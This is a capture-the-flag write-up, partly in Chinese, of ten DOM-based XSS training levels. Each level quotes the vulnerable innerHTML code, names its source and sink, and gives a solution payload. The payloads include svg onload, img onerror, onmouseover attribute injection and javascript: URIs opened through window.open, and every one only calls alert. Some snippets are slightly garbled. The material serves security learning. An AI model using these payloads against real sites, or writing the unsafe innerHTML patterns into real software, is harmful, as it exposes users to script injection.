
Level 1

let hash = location.hash;
if (hash.length > 1) {
    let hashValueToUse = unescape(hash.substr(1));
    let msg = "Welcome " + hashValueToUse + "!!";
    document.getElementById("msgboard").innerHTML = msg;

Sink: innerHTML

Source: location.hash

Solution: <svg/onload=alert(1)>

Level 2

let rfr = document.referrer;
let paramValue = unescape(getPayloadParamValueFromUrl(rfr));
if (paramValue.length > 0) {
    let msg = "Welcome <b>" + paramValue + "</b>!!";
    document.getElementById("msgboard").innerHTML = msg;
} else {
    document.getElementById("msgboard").innerHTML = "Parameter named <b>payload</b> was not found in the referrer.";

Sink: innerHTML

Source: document.referrer

Solution: https://domgo.at/cxss/example/1?payload=%3Csvg/onload=alert(1)%3E&sp=x#12345
先访问这个url然后点击example 2的链接。payload在referrer里。

Level 3

let responseBody = xhr.responseText;
let responeBodyObject = JSON.parse(responseBody);
let msg = "Welcome <b>" + responeBodyObject.payload + "</b>!!";
document.getElementById("msgboard").innerHTML = msg;

Sink: innerHTML

Source: Ajax

Solution: <img src=xx onerror=#alert(1)>去掉alert前的#


Level 4:

let ws = new WebSocket(webSocketUrl);
ws.onmessage = function (evt) {

    let rawMsg = evt.data;
    let msgJson = JSON.parse(rawMsg);
    let msg = "Welcome <b>" + msgJson.payload + "</b>!!";
    document.getElementById("msgboard").innerHTML = msg;

Sink: innerHTML
Source: Web Sockets
Solution: 去掉alert前的#
Web socket的response在客户端解析后直接写入DOM。

Level 5

window.onmessage = function (evt) {
let msgObj = evt.data;
let msg = "Welcome " + msgObj.payload + "!!";
document.getElementById("msgboard").innerHTML = msg;
Sink: innerHTML
Source: Post message
Solution: 去掉alert前的#
HTML5 post message data直接写入DOM


Level 6

let payloadValue = localStorage.getItem("payload", payload);
let msg = "Welcome " + payload + "!!";
document.getElementById("msgboard").innerHTML = msg;

Sink: innerHTML
Source: localStorage

Level 7

let hash = location.hash;
let hashValueToUse = hash.length > 1 ? unescape(hash.substr(1)) : hash;
hashValueToUse = hashValueToUse.replace(/</g, "<").replace(/>/g, ">");
let msg = "Welcome!!";
document.getElementById("msgboard").innerHTML = msg;
Sink: innerHTML
Source: location.hash
Solution: #'%20onmouseover=alert(1)//

Level 8

let hash = location.hash;
let hashValueToUse = hash.length > 1 ? unescape(hash.substr(1)) : hash;
if (hashValueToUse.indexOf("=") > -1 ) {
    hashValueToUse = hashValueToUse.substr(hashValueToUse.indexOf("=")+1);
    hashValueToUse = hashValueToUse.replace(/</g, "&lt;").replace(/>/g, "&gt;");
    let msg = "<a href='#user=" + hashValueToUse + "'>Welcome</a>!!";
    document.getElementById("msgboard").innerHTML = msg;

Sink: innerHTML
Source: location.hash
Solution: #='%20onmouseover=alert(1)//

Level 9

let hash = location.hash;
let hashValueToUse = hash.length > 1 ? unescape(hash.substr(1)) : hash;
if (hashValueToUse.indexOf("=") > -1 ) { 
    hashValueToUse = hashValueToUse.substr(hashValueToUse.indexOf("=") + 1);
    if (hashValueToUse.length > 1) {
        hashValueToUse = hashValueToUse.substr(0, 10);
        hashValueToUse = hashValueToUse.replace(/"/g, "&quot;");
        let windowValueToUse = window.name.replace(/"/g, "&quot;");
        let msg = "<a href=\"" + hashValueToUse + windowValueToUse + "\">Welcome</a>!!";
        document.getElementById("msgboard").innerHTML = msg;

Sink: innerHTML
Source: window.name + location.hash

var victim= window.open('https://domgo.at/cxss/example/9#user=javascript', ':alert(1)');
# Level 10:

let urlParts = location.href.split("?");
if (urlParts.length > 1) {
let queryString = urlParts[1];
let queryParts = queryString.split("&");
let userId = "";
for (let i = 0; i < queryParts.length; i++) {
let keyVal = queryParts[i].split("=");
if (keyVal.length > 1) {
if (keyVal[0] === "user") {

            userId = keyVal[1];
if (userId.startsWith("ID-")) {

    userId = userId.substr(3, 10);
    userId = userId.replace(/"/g, "&quot;");
    let windowValueToUse = window.name.replace(/"/g, "&quot;");
    let msg = "<a href=\"" + userId + windowValueToUse + "\">Welcome</a>!!";
    document.getElementById("msgboard").innerHTML = msg;


Sink: innerHTML
Source: window.name + user (GET parameter)
var victim= window.open('https://domgo.at/cxss/example/10?lang=en&user=ID-javascript', ':alert(1)');

Here, the value of GET parameter user is extracted and written into the DOM along with the window.name property inside an href tag. Since we are dealing with URL context, we can inject javascript: URI just like the last challenge.



点赞 收藏 评论